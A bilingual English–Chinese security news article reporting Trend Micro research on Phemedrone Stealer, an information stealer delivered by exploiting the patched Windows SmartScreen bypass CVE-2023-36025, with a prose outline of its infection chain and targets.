Threat actors have been observed leveraging a now-patched security flaw in Microsoft Windows to deploy an open-source information stealer called Phemedrone Stealer.
观察到威胁行为者利用微软Windows中一个现已修复的安全漏洞,部署了一个名为Phemedrone Stealer的开源信息窃取器。
"Phemedrone targets web browsers and data from cryptocurrency wallets and messaging apps such as Telegram, Steam, and Discord," Trend Micro researchers Peter Girnus, Aliakbar Zahravi, and Simon Zuckerbraun said.
"Phemedrone的目标是浏览器和加密货币钱包以及Telegram、Steam和Discord等消息应用程序中的数据。"Trend Micro研究员Peter Girnus,Aliakbar Zahravi和Simon Zuckerbraun说。
"It also takes screenshots and gathers system information regarding hardware, location, and operating system details. The stolen data is then sent to the attackers via Telegram or their command-and-control (C&C) server."
"它还能截屏并收集有关硬件、位置和操作系统详情的系统信息。然后窃取的数据通过Telegram或他们的指挥和控制(C&C)服务器发送给攻击者。"
The attacks leverage CVE-2023-36025 (CVSS score: 8.8), a security bypass vulnerability in Windows SmartScreen, that could be exploited by tricking a user into clicking on a specially crafted Internet Shortcut (.URL) or a hyperlink pointing to an Internet Shortcut file.
这些攻击利用了Windows SmartScreen中的一个安全绕过漏洞CVE-2023-36025(CVSS分数:8.8),可以通过欺骗用户点击一个特别精心设计的Internet Shortcut(.URL)或指向Internet Shortcut文件的超链接来利用。
The actively-exploited shortcoming was addressed by Microsoft as part of its November 2023 Patch Tuesday updates.
这个被积极利用的缺陷在微软2023年11月的Patch Tuesday更新中得到了解决。
The infection process involves the threat actor hosting malicious Internet Shortcut files on Discord or cloud services like FileTransfer.io, with the links also masked using URL shorteners such as Short URL.
感染过程涉及威胁行为者在Discord或FileTransfer.io等云服务上托管恶意的Internet Shortcut文件,链接也被URL缩短器(如Short URL)掩盖。
The execution of the booby-trapped .URL file allows it to connect to an actor-controlled server and execute a control panel (.CPL) file in a manner that circumvents Windows Defender SmartScreen by taking advantage of CVE-2023-36025.
陷阱文件.URL的执行使其能够连接到控制的服务器并以一种规避Windows Defender SmartScreen的方式执行控制面板(.CPL)文件,利用CVE-2023-36025的漏洞。
"When the malicious .CPL file is executed through the Windows Control Panel process binary, it in turn calls rundll32.exe to execute the DLL," the researchers said. "This malicious DLL acts as a loader that then calls on Windows PowerShell to download and execute the next stage of the attack, hosted on GitHub."
"当恶意的.CPL文件通过Windows控制面板进程二进制执行时,它又调用rundll32.exe来执行DLL,"研究人员说。"这个恶意的DLL充当一个加载器,然后调用Windows PowerShell来下载和执行下一阶段的攻击,托管在GitHub上。"
The follow-on payload is a PowerShell loader ("DATA3.txt") that acts as a launchpad for Donut, an open-source shellcode loader that decrypts and executes Phemedrone Stealer.
随后的payload是一个PowerShell加载器("DATA3.txt"),作为一个启动台来执行Donut,这是一个解密和执行Phemedrone Stealer的开源shellcode加载器。
Written in C#, Phemedrone Stealer is actively maintained by its developers on GitHub and Telegram, facilitating the theft of sensitive information from compromised systems.
Phemedrone Stealer用C#编写,由其开发人员在GitHub和Telegram上积极维护,从而有助于从受损系统中窃取敏感信息。
The development is once again a sign that threat actors are getting increasingly flexible and quickly adapting their attack chains to capitalize on newly disclosed exploits and inflict maximum damage.
这一发展再次表明,威胁行为者正变得越来越灵活,迅速调整他们的攻击链,以利用新披露的漏洞并造成最大的损害。
"Despite having been patched, threat actors continue to find ways to exploit CVE-2023-36025 and evade Windows Defender SmartScreen protections to infect users with a plethora of malware types, including ransomware and stealers like Phemedrone Stealer," the researchers said.
"尽管已经修补,威胁行为者仍在继续找到方法利用CVE-2023-36025和规避Windows Defender SmartScreen保护来感染用户,包括勒索软件和Phemedrone Stealer等窃取者等各种恶意软件类型。"
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...